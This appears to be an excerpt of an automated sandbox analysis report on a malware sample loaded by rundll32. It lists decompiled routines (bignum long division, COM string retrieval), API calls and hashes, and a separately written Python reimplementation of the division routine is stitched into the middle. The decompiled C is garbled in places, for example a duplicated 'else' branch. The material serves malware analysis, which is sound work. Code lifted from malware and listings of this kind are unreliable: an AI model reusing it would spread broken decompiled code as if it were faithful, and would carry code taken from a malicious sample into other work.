                                          			// consistent with a second copy of the same routine.
                                          			E048935A2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v156;
                                          				void _v428;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          				intOrPtr _t97;    // used below, declaration omitted by the decompiler
                                          				void* _t106;      // used below, declaration omitted by the decompiler
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E048913E0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);   // most significant dword of the _t79-dword operand at _t92
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;   // 32 minus the bit count of that dword (see the >> 1 loop at the end): the normalising shift
                                          					_v12 = _t96 - _t81;
                                          					E04897099(_t79,  &_v428);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0489381E(_t101,  &_v428, _a8, _t96 - _t81);   // _a8 (_t101 dwords) processed by the shift amount into _v428; the returned dword is stored above it
                                          					E0489381E(_t79,  &_v156, _a12, _t97);   // _a12 (_t79 dwords) processed by the same shift amount into _v156
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));   // top dword of _v156
                                          					_t66 = E04897099(_t101, 0x489a1d0);   // fixed global result buffer, _t101 dwords
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E04897099(_a16, _a4);
                                          						E04894191(_t79,  &_v428, _a4, _t97);
                                          						memset( &_v428, 0, 0x10c);   // wipe both stack work buffers before returning (0x10c = 67 dwords)
                                          						_t55 = memset( &_v156, 0, 0x84);   // (0x84 = 33 dwords)
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L048981CA();   // _allmul( *_t99, 0, 0, 1): *_t99 * 0x100000000, i.e. *_t99 becomes the high dword
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");   // 64-bit value ( *_t99 : *(_t99 - 4))
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L048981C4();   // _aulldiv: that 64-bit value divided by (_v8 + 1)
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;   // clamp the quotient estimate to 0xffffffff
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                          						_a12 = _t74;
                                          						_t76 = E04893ADE(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                          						while(1) {   // correction loop: while *_t99 is non-zero or E048940E5 does not report the window below _v156, call E04895908 once more and bump _a12
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v156;
                                          							if(E048940E5(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E04895908(_t79,  &_v156, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x489a1d0 + _a8 * 4) = _t66;   // digit written to a fixed global buffer: results live in static storage, so the routine is not reentrant
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}

                                          (Per-line instruction addresses for the listing above, originally a separate column: 0x048935a5 to 0x04893736, inside E048935A2. The entries are not monotonic because the decompiler reorders basic blocks; 0x00000000 stands for lines that have no address.)

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04893655
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 0489366B
                                          • memset.NTDLL ref: 04893714
                                          • memset.NTDLL ref: 0489372A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 60f6cc77e61fb676e7b2c0148db9b80c06a535930dd2f8a4b6f5beff41048b38
                                          • Instruction ID: c12ae92ea3589d664b0bff70daf896d2fca7923dcd811edb0febeaba7cf59012
                                          • Opcode Fuzzy Hash: 60f6cc77e61fb676e7b2c0148db9b80c06a535930dd2f8a4b6f5beff41048b38
                                          • Instruction Fuzzy Hash: 12419071B00619AFEF119E6CCC40BDE77A5EF49714F044A69E819E7280EBB0BE449B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00B67126
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00B6713C
                                          • memset.NTDLL ref: 00B671E5
                                          • memset.NTDLL ref: 00B671FB
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 81002ac5c84b6cf1f8659534343273a57bc536d2cddc4f2a8a9a58bbf68a570e
                                          • Instruction ID: b3cd45880de4841736f1897e64654b7becf52113390fddb9da7864202195e24a
                                          • Opcode Fuzzy Hash: 81002ac5c84b6cf1f8659534343273a57bc536d2cddc4f2a8a9a58bbf68a570e
                                          • Instruction Fuzzy Hash: 7F41F431A00219AFDB20DF68CC81BEE77F5EF46714F1045AAF919A7281DF74AE458B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%
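The entry for E048935A2 above and the entry at 00B67126 share one API sequence (memset, _allmul, _aulldiv) and the same API String ID, 3041852380. What follows is an added reference reimplementation, not code from the sample or from Joe Sandbox, of what the structure of E048935A2 suggests: schoolbook multi-precision division with the quotient estimate taken from the top two dwords divided by (top divisor dword + 1) and then corrected upward. Everything about the helpers is an assumption, not something the report states: 32-bit little-endian limbs, E048913E0 as effective length, E04897099 as zero-fill, E0489381E/E04894191 as shift left/right, E04893ADE as multiply-subtract, E04895908 as subtract and E048940E5 as compare. The model checks itself against Python integers, which is the way to confirm such a hypothesis before relying on it.

```python
"""Limb-level long division with the structure of E048935A2 (added example, not the
sample's code). Assumed, not stated in the report: 32-bit little-endian limbs and the
roles given to the sample's helpers in the comments below."""

B = 1 << 32
MASK = B - 1


def to_limbs(x, nlimbs=0):
    """int -> little-endian 32-bit limbs, zero-padded to at least nlimbs."""
    limbs = []
    while x:
        limbs.append(x & MASK)
        x >>= 32
    return limbs + [0] * (nlimbs - len(limbs))


def from_limbs(limbs):
    return sum(w << (32 * i) for i, w in enumerate(limbs))


def effective_len(limbs):
    """Index past the most significant non-zero limb (role assumed for E048913E0)."""
    n = len(limbs)
    while n and limbs[n - 1] == 0:
        n -= 1
    return n


def shift_left(limbs, n, s):
    """(limbs[:n] << s) as n limbs plus the carried-out limb (cf. E0489381E)."""
    out, carry = [], 0
    for i in range(n):
        w = (limbs[i] << s) | carry
        out.append(w & MASK)
        carry = w >> 32
    return out, carry


def shift_right(limbs, n, s):
    """limbs[:n] >> s as n limbs (cf. E04894191); bits above limb n-1 are dropped."""
    return [((limbs[i] >> s) | ((limbs[i + 1] << (32 - s)) if i + 1 < n else 0)) & MASK
            for i in range(n)]


def mul_sub(u, j, v, n, qhat):
    """u[j:j+n] -= qhat * v[:n]; returns the borrow out of limb j+n-1 (cf. E04893ADE)."""
    borrow = 0
    for i in range(n):
        t = u[j + i] - qhat * v[i] - borrow
        u[j + i] = t % B
        borrow = (u[j + i] - t) // B
    return borrow


def sub(u, j, v, n):
    """u[j:j+n] -= v[:n]; returns the final borrow (cf. E04895908)."""
    borrow = 0
    for i in range(n):
        t = u[j + i] - v[i] - borrow
        u[j + i] = t % B
        borrow = int(t < 0)
    return borrow


def cmp_window(u, j, v, n):
    """Sign of u[j:j+n] - v[:n], most significant limb first (cf. E048940E5)."""
    for i in range(n - 1, -1, -1):
        if u[j + i] != v[i]:
            return -1 if u[j + i] < v[i] else 1
    return 0


def divmod_limbs(u, v):
    """Schoolbook division of limb lists; returns (quotient limbs, remainder limbs)."""
    n = effective_len(v)
    if n == 0:
        raise ZeroDivisionError
    u = list(u) + [0] * max(0, n - len(u))
    # Normalise: the sample counts the bits of v's top limb with a >> 1 loop and shifts
    # both operands left by 32 - bits, so the divisor's top limb gets bit 31 set.
    top, bits = v[n - 1], 0
    while top:
        bits += 1
        top >>= 1
    s = 32 - bits
    un, carry = shift_left(u, len(u), s)
    un.append(carry)                  # the shifted-out limb the sample stores above its buffer
    vn, _ = shift_left(v, n, s)       # no carry: the top limb had s leading zeros
    vtop = vn[n - 1]
    m = len(u) - n
    q = [0] * (m + 1)
    for j in range(m, -1, -1):
        if vtop != MASK:
            # 64-bit estimate (the _allmul/_aulldiv pair); dividing by vtop + 1 makes qhat
            # an under-estimate of the true digit, so the correction below only goes up.
            qhat = min(((un[j + n] << 32) | un[j + n - 1]) // (vtop + 1), MASK)
        else:
            qhat = un[j + n]          # the sample's special case for a 0xffffffff top limb
        un[j + n] -= mul_sub(un, j, vn, n, qhat)
        # Correct upward, as the sample's subtract/compare loop does, until the window is < v.
        while un[j + n] != 0 or cmp_window(un, j, vn, n) >= 0:
            qhat += 1
            un[j + n] -= sub(un, j, vn, n)
        q[j] = qhat
    return q, shift_right(un, n, s)   # remainder de-normalised with the same shift


def check(a, b):
    """True if the limb-level result equals Python's divmod(a, b)."""
    q, r = divmod_limbs(to_limbs(a), to_limbs(b))
    return (from_limbs(q), from_limbs(r)) == divmod(a, b)


if __name__ == "__main__":
    # Constructed inputs sized to the sample's 0x10c / 0x84 byte work buffers.
    for a, b in [((1 << 2047) + 12345, (1 << 1023) + 7), ((1 << 64) - 1, MASK), (5, 1 << 70)]:
        print(check(a, b))
```

The version written here keeps the quotient in a fresh list; the sample instead writes each digit into the fixed global at 0x489a1d0, which is worth remembering when hooking the routine, since its output is not on the stack and a second caller would overwrite it.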

                                          APIs
                                          • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 00B57FAA
                                          • StrChrA.SHLWAPI(?,0000005C), ref: 00B57FD1
                                          • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 00B57FF7
                                          • lstrcpy.KERNEL32(?,?), ref: 00B5809B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrcpyn
                                          • String ID:
                                          • API String ID: 4154805583-0
                                          • Opcode ID: 6eb3f6304e43a41f97df114672e01a75b2a25c929d294e0b2e664a79a85fb588
                                          • Instruction ID: cca4ef501500334815afe621158a66f56d92bdaed854b980c4964f5f3bb6186d
                                          • Opcode Fuzzy Hash: 6eb3f6304e43a41f97df114672e01a75b2a25c929d294e0b2e664a79a85fb588
                                          • Instruction Fuzzy Hash: A0412C76900119BFDB12DBA4DC88EEE7BFCEB09351F0544E6E905E7191DB349A48CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _strupr
                                          • String ID:
                                          • API String ID: 3408778250-0
                                          • Opcode ID: f2bbf3d7ea1440f5915b1329417f4de79abab6089591520b901390d69dc40c37
                                          • Instruction ID: c212438b4fe00785802ad95c6f1992fb2f5f201bca01105b865505fb29c84c85
                                          • Opcode Fuzzy Hash: f2bbf3d7ea1440f5915b1329417f4de79abab6089591520b901390d69dc40c37
                                          • Instruction Fuzzy Hash: D241917284020D9EDB34DF64C889BAEB7E8FF14341F1549A5EC29D7161EB78D988CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 00B553C3
                                          • GetLastError.KERNEL32 ref: 00B553DC
                                            • Part of subcall function 00B5E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,00B72953,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000), ref: 00B5E564
                                          • ResetEvent.KERNEL32(?), ref: 00B55455
                                          • GetLastError.KERNEL32 ref: 00B55470
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 47941985b1268e65d9a56df62aaa10e6905d728d7d0329f60d028d48006ff43e
                                          • Instruction ID: 1fd8dc4d8318c702e6d8307a7d0a80bb36ec147eb6eda618fd0da92ba709ea5d
                                          • Opcode Fuzzy Hash: 47941985b1268e65d9a56df62aaa10e6905d728d7d0329f60d028d48006ff43e
                                          • Instruction Fuzzy Hash: 1F31C632500A04ABDB319BA5CC54F6EB7FAEF84363F2445E4F91597290EB70E9899B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B5FA32: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 00B5FA40
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6CFB6
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B6D007
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 00B534C6
                                            • Part of subcall function 00B53486: GetLastError.KERNEL32 ref: 00B534D0
                                            • Part of subcall function 00B53486: WaitForSingleObject.KERNEL32(000000C8), ref: 00B534F5
                                            • Part of subcall function 00B53486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 00B53518
                                            • Part of subcall function 00B53486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00B53540
                                            • Part of subcall function 00B53486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 00B53555
                                            • Part of subcall function 00B53486: SetEndOfFile.KERNEL32(?), ref: 00B53562
                                            • Part of subcall function 00B53486: CloseHandle.KERNEL32(?), ref: 00B5357A
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 00B6D03C
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001,?,?,?,?,?,?,00B59EB6,?), ref: 00B6D04C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                          • String ID:
                                          • API String ID: 4200334623-0
                                          • Opcode ID: a50c20cdde36e51d561a336aebc311bb508127aaad8852f2792971c9ae8c0197
                                          • Instruction ID: ad99d3bc16bdb943b5cffe13afd810cf679ae294c292ca03610b213cbd692600
                                          • Opcode Fuzzy Hash: a50c20cdde36e51d561a336aebc311bb508127aaad8852f2792971c9ae8c0197
                                          • Instruction Fuzzy Hash: 76312C76A00015BFEB109FA4DC88CAABBBDEF09350B1044A5FA09D3160DB71AE91DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 00B5E63F
                                          • SetEvent.KERNEL32(?,?,?,?,00B5D3E9,?,?), ref: 00B5E64F
                                          • GetLastError.KERNEL32 ref: 00B5E6D8
                                            • Part of subcall function 00B5E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,00B72953,0000EA60,?,?,?,00B6C0C1,00000000,0000EA60,00000000), ref: 00B5E564
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • GetLastError.KERNEL32(00000000), ref: 00B5E70D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 692670616c461f19b95c1e3b5d5ebb38e321e6646fc396bc9159ba34dce35402
                                          • Instruction ID: 46bee5c279cec5775c561423cb896c859d5ce65dfce7ced6e6dfad1fbe1ab2a9
                                          • Opcode Fuzzy Hash: 692670616c461f19b95c1e3b5d5ebb38e321e6646fc396bc9159ba34dce35402
                                          • Instruction Fuzzy Hash: BA31FDB5900309EFDB249FA5C884A9EB7F8EB08345F1049EAEA1693151D731EF489F10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • TlsGetValue.KERNEL32(?), ref: 00B693D6
                                          • SetEvent.KERNEL32(?), ref: 00B69420
                                          • TlsSetValue.KERNEL32(00000001), ref: 00B6945A
                                          • TlsSetValue.KERNEL32(00000000), ref: 00B69476
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$Event
                                          • String ID:
                                          • API String ID: 3803239005-0
                                          • Opcode ID: c556e32e0bc8766f6a9c29e2b0960670b63c785b2f3947e431f60062fe8a56db
                                          • Instruction ID: a090806738598494c752c76daeb10371c048933768c040434551ccc63b7664b4
                                          • Opcode Fuzzy Hash: c556e32e0bc8766f6a9c29e2b0960670b63c785b2f3947e431f60062fe8a56db
                                          • Instruction Fuzzy Hash: F321AD72100204AFCB319F18DC85AAA7BF9FF41761B104464F456DBA60DB31DCA2DB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B5F43E
                                          • memcpy.NTDLL(00000018,?,?), ref: 00B5F467
                                          • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000C3EA,00000000,000000FF,00000008), ref: 00B5F4A6
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5F4B9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                          • String ID:
                                          • API String ID: 2780211928-0
                                          • Opcode ID: 10d2042a11a8ba6ab3347bdff62976440b15d288461cbc0d7c41d57e518fbfa8
                                          • Instruction ID: 4c2dcde1d94f377fe09cdbc0d1cd2b9d830fe287bba101fb8b363aa996a1a0de
                                          • Opcode Fuzzy Hash: 10d2042a11a8ba6ab3347bdff62976440b15d288461cbc0d7c41d57e518fbfa8
                                          • Instruction Fuzzy Hash: 67313E71200606AFDB209F28EC44FAA7BE9EF15361F008569FD1AD73A0DB74D955CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6F4A1: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,00B5D3E9), ref: 00B6F4D7
                                            • Part of subcall function 00B6F4A1: memset.NTDLL ref: 00B6F54D
                                            • Part of subcall function 00B6F4A1: memset.NTDLL ref: 00B6F561
                                          • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 00B5797C
                                          • lstrcmpi.KERNEL32(00000000,?), ref: 00B579A3
                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00B579E8
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 00B579F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                          • String ID:
                                          • API String ID: 1065503980-0
                                          • Opcode ID: b500a1456c5bf51f03a4766e3e461169ed718ce1bccc07162234c29d348507f1
                                          • Instruction ID: 89d41ee3be149ca51d75c23ced27fb979fb27781df1c0d37ec96b4014c212b46
                                          • Opcode Fuzzy Hash: b500a1456c5bf51f03a4766e3e461169ed718ce1bccc07162234c29d348507f1
                                          • Instruction Fuzzy Hash: ED214B71A40209FFEF11AFA4EC85EAE7BF9EB04315F1044A5F909E7121DB359D988B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B71A05
                                          • lstrlen.KERNEL32(00000000), ref: 00B71A16
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • strcpy.NTDLL ref: 00B71A2D
                                          • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 00B71A37
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeaplstrlenmemsetstrcpy
                                          • String ID:
                                          • API String ID: 528014985-0
                                          • Opcode ID: bad24dc50efe8148c23c67f80fab0bb0cca7d4924ca06cb0a1c289ce97df1efd
                                          • Instruction ID: 7df3e46a3d3db71e948def78d29371176b296b42a60f30ad7da0a7e65ccd40a7
                                          • Opcode Fuzzy Hash: bad24dc50efe8148c23c67f80fab0bb0cca7d4924ca06cb0a1c289ce97df1efd
                                          • Instruction Fuzzy Hash: DB21BE76141301AFD720AF6CDC89B6A77E8EB44311F04C859F97E87291EF75D8848B21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E048951D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0;
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E04894DF6(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: f51ce2b3208f12643d902ae83645db388ad86e0f4b1096f78e09b5592d7a5c93
                                          • Instruction ID: 580d97a1dfa1e699f44d3afca15c35d40bf16656ac70dbf9d9549074b27d6e91
                                          • Opcode Fuzzy Hash: f51ce2b3208f12643d902ae83645db388ad86e0f4b1096f78e09b5592d7a5c93
                                          • Instruction Fuzzy Hash: 40212A76901609FFCF15DFE8D88499EBBF9EF48301B184669E901E7200EB70AE01CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B62A14
                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 00B62A58
                                          • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 00B62A9B
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00B62ABE
                                            • Part of subcall function 00B5BD6D: GetTickCount.KERNEL32 ref: 00B5BD7D
                                            • Part of subcall function 00B5BD6D: CreateFileW.KERNEL32(00000000,80000000,00000003,00B79208,00000003,00000000,00000000,?,?,00000000), ref: 00B5BD9A
                                            • Part of subcall function 00B5BD6D: GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 00B5BDCD
                                            • Part of subcall function 00B5BD6D: CreateFileMappingA.KERNEL32(00000000,00B79208,00000002,00000000,00000000,?), ref: 00B5BDE1
                                            • Part of subcall function 00B5BD6D: lstrlen.KERNEL32(?,?,?,00000000), ref: 00B5BDFD
                                            • Part of subcall function 00B5BD6D: lstrcpy.KERNEL32(?,?), ref: 00B5BE0D
                                            • Part of subcall function 00B5BD6D: HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 00B5BE28
                                            • Part of subcall function 00B5BD6D: CloseHandle.KERNEL32(?,?), ref: 00B5BE3A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                          • String ID:
                                          • API String ID: 3239194699-0
                                          • Opcode ID: 239c6fb493e21f5c35ce8812290f3a86b44d53910bca08d30330bc2aa5dbd2ed
